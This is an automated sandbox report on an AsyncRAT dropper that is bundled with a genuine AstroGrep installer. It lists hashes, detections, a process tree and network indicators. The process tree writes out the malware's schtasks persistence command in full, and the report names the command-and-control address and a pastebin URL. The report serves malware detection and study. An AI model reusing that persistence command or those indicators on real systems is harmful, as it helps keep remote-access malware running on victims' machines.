Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ms.bin

Overview

General Information

Sample Name:ms.bin (renamed file extension from bin to exe)
Analysis ID:450276
MD5:dbbb611daf3abd47972ae4faf5d54c95
SHA1:1b33772f2acc9e6673a2922587b00db86f5fba01
SHA256:d5a8b6cb7b39d6f71ce67c6c8e17030079f2778087ee12c0ad45bd823f7bd53c
Tags:Asyncexe
Infos:

Most interesting Screenshot:

Detection

AsyncRAT
Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AsyncRAT
.NET source code contains potential unpacker
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Regsvr32 Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ms.exe (PID: 4156 cmdline: 'C:\Users\user\Desktop\ms.exe' MD5: DBBB611DAF3ABD47972AE4FAF5D54C95)
    • ASTRO-GREP.EXE (PID: 5416 cmdline: 'C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE' MD5: 432F0E0AAB658DE046D8B41D2CEF8253)
      • cmd.exe (PID: 912 cmdline: 'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe'' & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5996 cmdline: schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe'' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 3352 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmp7B21.tmp.bat'' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 1364 cmdline: timeout 3 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
        • astro-grep.exe (PID: 2792 cmdline: 'C:\Users\user\AppData\Roaming\astro-grep.exe' MD5: 432F0E0AAB658DE046D8B41D2CEF8253)
    • ASTROGREP_SETUP_V4.4.7.EXE (PID: 3728 cmdline: 'C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE' MD5: A708211241313FEAF9621E571631534D)
  • astro-grep.exe (PID: 748 cmdline: C:\Users\user\AppData\Roaming\astro-grep.exe MD5: 432F0E0AAB658DE046D8B41D2CEF8253)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
ms.exeMalware_QA_updateVT Research QA uploaded malware - file update.exeFlorian Roth
  • 0xa0a8:$x4: C:\Users\DarkCoderSc\
  • 0xa0c5:$x5: Celesty Binder\Stub\STATIC\Stub.pdb
ms.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      C:\Users\user\AppData\Roaming\astro-grep.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000003.00000002.250713765.0000000002A4E000.00000004.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          0000000D.00000000.253043295.0000000000772000.00000002.00020000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            00000003.00000000.197769647.00000000005F2000.00000002.00020000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              00000003.00000002.250001680.00000000005F2000.00000002.00020000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                  Click to see the 7 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  17.2.astro-grep.exe.430000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                    3.0.ASTRO-GREP.EXE.5f0000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                      1.2.ms.exe.a3f330.2.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                        13.2.astro-grep.exe.770000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                          3.2.ASTRO-GREP.EXE.5f0000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                            Click to see the 11 entries

                            Sigma Overview

                            System Summary:

                            barindex
                            Sigma detected: Regsvr32 AnomalyShow sources
                            Source: Process startedAuthor: Florian Roth, oscd.community: Data: Command: 'C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE' , CommandLine: 'C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE, NewProcessName: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE, OriginalFileName: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE, ParentCommandLine: 'C:\Users\user\Desktop\ms.exe' , ParentImage: C:\Users\user\Desktop\ms.exe, ParentProcessId: 4156, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE' , ProcessId: 5416

                            Jbx Signature Overview

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection:

                            barindex
                            Antivirus / Scanner detection for submitted sampleShow sources
                            Source: ms.exeAvira: detected
                            Antivirus detection for dropped fileShow sources
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEAvira: detection malicious, Label: TR/Dropper.Gen
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeAvira: detection malicious, Label: TR/Dropper.Gen
                            Multi AV Scanner detection for submitted fileShow sources
                            Source: ms.exeVirustotal: Detection: 78%Perma Link
                            Machine Learning detection for dropped fileShow sources
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeJoe Sandbox ML: detected
                            Machine Learning detection for sampleShow sources
                            Source: ms.exeJoe Sandbox ML: detected
                            Source: 3.0.ASTRO-GREP.EXE.5f0000.0.unpackAvira: Label: TR/Dropper.Gen
                            Source: 3.2.ASTRO-GREP.EXE.5f0000.0.unpackAvira: Label: TR/Dropper.Gen
                            Source: 17.2.astro-grep.exe.430000.0.unpackAvira: Label: TR/Dropper.Gen
                            Source: 13.2.astro-grep.exe.770000.0.unpackAvira: Label: TR/Dropper.Gen
                            Source: 1.0.ms.exe.a30000.0.unpackAvira: Label: TR/Dropper.Gen
                            Source: 17.0.astro-grep.exe.430000.0.unpackAvira: Label: TR/Dropper.Gen
                            Source: 1.0.ms.exe.a4b130.2.unpackAvira: Label: TR/Patched.Ren.Gen
                            Source: 13.0.astro-grep.exe.770000.0.unpackAvira: Label: TR/Dropper.Gen
                            Source: 1.2.ms.exe.a4b130.3.unpackAvira: Label: TR/Patched.Ren.Gen
                            Source: 1.2.ms.exe.a30000.1.unpackAvira: Label: TR/Dropper.Gen
                            Source: ms.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                            Source: unknownHTTPS traffic detected: 104.23.98.190:443 -> 192.168.2.3:49727 version: TLS 1.0
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEWindow detected: < &BackI &AgreeCancelNullsoft Install System v3.0rc1 Nullsoft Install System v3.0rc1License AgreementPlease review the license terms before installing AstroGrep v4.4.7.Press Page Down to see the rest of the agreement. GNU GENERAL PUBLIC LICENSE Version 2 June 1991 Copyright (C) 1989 1991 Free Software Foundation Inc. 59 Temple Place Suite 330 Boston MA 02111-1307 USA Everyone is permitted to copy and distribute verbatim copies of this license document but changing it is not allowed. Preamble The licenses for most software are designed to take away yourfreedom to share and change it. By contrast the GNU General PublicLicense is intended to guarantee your freedom to share and change freesoftware--to make sure the software is free for all its users. ThisGeneral Public License applies to most of the Free SoftwareFoundation's software and to any other program whose authors commit tousing it. (Some other Free Software Foundation software is covered bythe GNU Library General Public License instead.) You can apply it toyour programs too. When we speak of free software we are referring to freedom notprice. Our General Public Licenses are designed to make sure that youhave the freedom to distribute copies of free software (and charge forthis service if you wish) that you receive source code or can get itif you want it that you can change the software or use pieces of itin new free programs; and that you know you can do these things. To protect your rights we need to make restrictions that forbidanyone to deny you these rights or to ask you to surrender the rights.These restrictions translate to certain responsibilities for you if youdistribute copies of the software or if you modify it. For example if you distribute copies of such a program whethergratis or for a fee you must give the recipients all the rights thatyou have. You must make sure that they too receive or can get thesource code. And you must show them these terms so they know theirrights. We protect your rights with two steps: (1) copyright the software and(2) offer you this license which gives you legal permission to copydistribute and/or modify the software. Also for each author's protection and ours we want to make certainthat everyone understands that there is no warranty for this freesoftware. If the software is modified by someone else and passed on wewant its recipients to know that what they have is not the original sothat any problems introduced by others will not reflect on the originalauthors' reputations. Finally any free program is threatened constantly by softwarepatents. We wish to avoid the danger that redistributors of a freeprogram will individually obtain patent licenses in effect making theprogram proprietary. To prevent this we have made it clear that anypatent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying distribution andmodification follow. GNU GENERAL PUBLIC L
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\Program Files (x86)\AstroGrep\license.txtJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile created: C:\Program Files (x86)\AstroGrep\readme.txtJump to behavior
                            Source: ms.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                            Source: Binary string: Re:\code\projects\c#\AstroGrep\svn\AdminProcess\obj\Release\AstroGrep.AdminProcess.pdb- source: AstroGrep.AdminProcess.exe.5.dr
                            Source: Binary string: e:\code\projects\c#\AstroGrep\svn\AstroGrep.Common\obj\Release\AstroGrep.Common.pdb source: AstroGrep.Common.dll.5.dr
                            Source: Binary string: C:\Users\DarkCoderSc\Desktop\Celesty Binder\Stub\STATIC\Stub.pdb source: ms.exe
                            Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net40-client\NLog.pdbSHA256 source: ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, NLog.dll.5.dr
                            Source: Binary string: c:\work\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\ICSharpCode.AvalonEdit.pdb source: ICSharpCode.AvalonEdit.dll.5.dr
                            Source: Binary string: e:\code\projects\c#\AstroGrep\svn\libAstroGrep\obj\Release\libAstroGrep.pdb@ source: libAstroGrep.dll.5.dr
                            Source: Binary string: .exe;.dll;.pdb;.msi;.sys;.ppt;.gif;.jpg;.jpeg;.png;.bmp;.class;.chm+{0}{4}{1}{4}{2}{4}{3} source: AstroGrep.exe.5.dr
                            Source: Binary string: e:\code\projects\c#\AstroGrep\svn\libAstroGrep\obj\Release\libAstroGrep.pdb source: libAstroGrep.dll.5.dr
                            Source: Binary string: &C:\Users\DarkCoderSc\Desktop\Celesty Binder\Stub\STATIC\Stub.pdb source: ms.exe
                            Source: Binary string: c:\work\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\ICSharpCode.AvalonEdit.pdbT source: ICSharpCode.AvalonEdit.dll.5.dr
                            Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net40-client\NLog.pdb source: ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, NLog.dll.5.dr
                            Source: Binary string: e:\code\projects\c#\AstroGrep\svn\AdminProcess\obj\Release\AstroGrep.AdminProcess.pdb source: AstroGrep.AdminProcess.exe.5.dr
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXECode function: 5_2_00406033 FindFirstFileA,FindClose,5_2_00406033
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXECode function: 5_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_004055D1
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXECode function: 5_2_00402688 FindFirstFileA,5_2_00402688
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

                            Networking:

                            barindex
                            Connects to a pastebin service (likely for C&C)Show sources
                            Source: unknownDNS query: name: pastebin.com
                            Source: global trafficTCP traffic: 192.168.2.3:49728 -> 185.195.232.251:57667
                            Source: Joe Sandbox ViewIP Address: 104.23.98.190 104.23.98.190
                            Source: Joe Sandbox ViewIP Address: 104.23.98.190 104.23.98.190
                            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                            Source: unknownHTTPS traffic detected: 104.23.98.190:443 -> 192.168.2.3:49727 version: TLS 1.0
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.195.232.251
                            Source: unknownDNS traffic detected: queries for: pastebin.com
                            Source: AstroGrep.exe.5.drString found in binary or memory: http://astrogrep.sourceforge.net
                            Source: AstroGrep.exe.5.drString found in binary or memory: http://astrogrep.sourceforge.net/Ihttp://www.gnu.org/copyleft/gpl.html
                            Source: AstroGrep.exe.5.drString found in binary or memory: http://astrogrep.sourceforge.net/download/
                            Source: AstroGrep.Common.dll.5.drString found in binary or memory: http://astrogrep.sourceforge.net/version.htmlUhttp://astrogrep.sourceforge.net/download/Whttps://sou
                            Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0
                            Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncRSACA-2.crl07
                            Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                            Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncRSACA-2.crl0
                            Source: AstroGrep.exe.5.drString found in binary or memory: http://downloads.sourceforge.net/astrogrep/
                            Source: AstroGrep.exe.5.drString found in binary or memory: http://downloads.sourceforge.net/astrogrep/readme.txt
                            Source: ICSharpCode.AvalonEdit.dll.5.drString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit
                            Source: ICSharpCode.AvalonEdit.dll.5.drString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.Highlighting
                            Source: ICSharpCode.AvalonEdit.dll.5.drString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.HighlightingQ
                            Source: ICSharpCode.AvalonEdit.dll.5.drString found in binary or memory: http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008
                            Source: ICSharpCode.AvalonEdit.dll.5.drString found in binary or memory: http://icsharpcode.net/sharpdevelop/syntaxdefinition/20081Error
                            Source: NLog.dll.5.drString found in binary or memory: http://nlog-project.org/dummynamespace/
                            Source: NLog.dll.5.drString found in binary or memory: http://nlog-project.org/ws/
                            Source: NLog.dll.5.drString found in binary or memory: http://nlog-project.org/ws/3
                            Source: NLog.dll.5.drString found in binary or memory: http://nlog-project.org/ws/5
                            Source: NLog.dll.5.drString found in binary or memory: http://nlog-project.org/ws/ILogReceiverOneWayServer/ProcessLogMessages
                            Source: NLog.dll.5.drString found in binary or memory: http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesResponsep
                            Source: NLog.dll.5.drString found in binary or memory: http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesT
                            Source: NLog.dll.5.drString found in binary or memory: http://nlog-project.org/ws/T
                            Source: ASTROGREP_SETUP_V4.4.7.EXE, ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, ms.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
                            Source: ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000003.256251943.000000000074E000.00000004.00000001.sdmp, ms.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                            Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                            Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                            Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com
                            Source: astro-grep.exeString found in binary or memory: http://schemas.microsof
                            Source: NLog.dll.5.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: ASTRO-GREP.EXE, 00000003.00000002.250692664.0000000002A34000.00000004.00000001.sdmp, astro-grep.exe, 0000000D.00000002.462172433.0000000002B2D000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
                            Source: AstroGrep.exe.5.drString found in binary or memory: http://www.gnu.org/copyleft/gpl.html
                            Source: AstroGrep.exe.5.drString found in binary or memory: http://www.gnu.org/copyleft/gpl.html#SEC3
                            Source: NLog.dll.5.drString found in binary or memory: https://nlog-project.org/
                            Source: astro-grep.exe, 0000000D.00000002.462172433.0000000002B2D000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com
                            Source: astro-grep.exe, 00000011.00000002.310812731.0000000002781000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw
                            Source: astro-grep.exe, 00000011.00000002.310812731.0000000002781000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/VTByvKGM
                            Source: astro-grep.exe, 0000000D.00000002.462183818.0000000002B36000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com43l
                            Source: astro-grep.exe, 0000000D.00000002.462364002.0000000002CB8000.00000004.00000001.sdmp, astro-grep.exe, 0000000D.00000002.462336171.0000000002C73000.00000004.00000001.sdmp, astro-grep.exe, 0000000D.00000002.462353763.0000000002C96000.00000004.00000001.sdmp, astro-grep.exe, 0000000D.00000002.462305606.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.comD83l
                            Source: astro-grep.exe, 0000000D.00000002.462235560.0000000002B82000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.comD83lh;
                            Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmp, astro-grep.exe, 0000000D.00000002.462364002.0000000002CB8000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                            Source: astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                            Source: ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, NLog.dll.5.drString found in binary or memory: https://www.nuget.org/packages/NLog.Web.AspNetCore
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727

                            Key, Mouse, Clipboard, Microphone and Screen Capturing:

                            barindex
                            Yara detected AsyncRATShow sources
                            Source: Yara matchFile source: ms.exe, type: SAMPLE
                            Source: Yara matchFile source: 17.2.astro-grep.exe.430000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.0.ASTRO-GREP.EXE.5f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.ms.exe.a3f330.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.astro-grep.exe.770000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.ASTRO-GREP.EXE.5f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.0.astro-grep.exe.430000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.ASTRO-GREP.EXE.2a4e31c.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.0.astro-grep.exe.770000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.ASTRO-GREP.EXE.2a4e31c.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.0.ms.exe.a3f330.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.0.ms.exe.a30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.0.ms.exe.a3f330.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.ms.exe.a30000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.ms.exe.a3f330.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000003.00000002.250713765.0000000002A4E000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000000.253043295.0000000000772000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.197769647.00000000005F2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.250001680.00000000005F2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000000.195464436.0000000000A3F000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.310239259.0000000000432000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000000.259955019.0000000000432000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.460832273.0000000000772000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: astro-grep.exe PID: 748, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: astro-grep.exe PID: 2792, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ASTRO-GREP.EXE PID: 5416, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\astro-grep.exe, type: DROPPED
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXECode function: 5_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_00405086

                            System Summary:

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXECode function: 5_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040310F
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXECode function: 3_2_00F281483_2_00F28148
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXECode function: 3_2_00F2B2583_2_00F2B258
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXECode function: 3_2_00F2E5B03_2_00F2E5B0
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXECode function: 3_2_00F278783_2_00F27878
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXECode function: 3_2_00F271303_2_00F27130
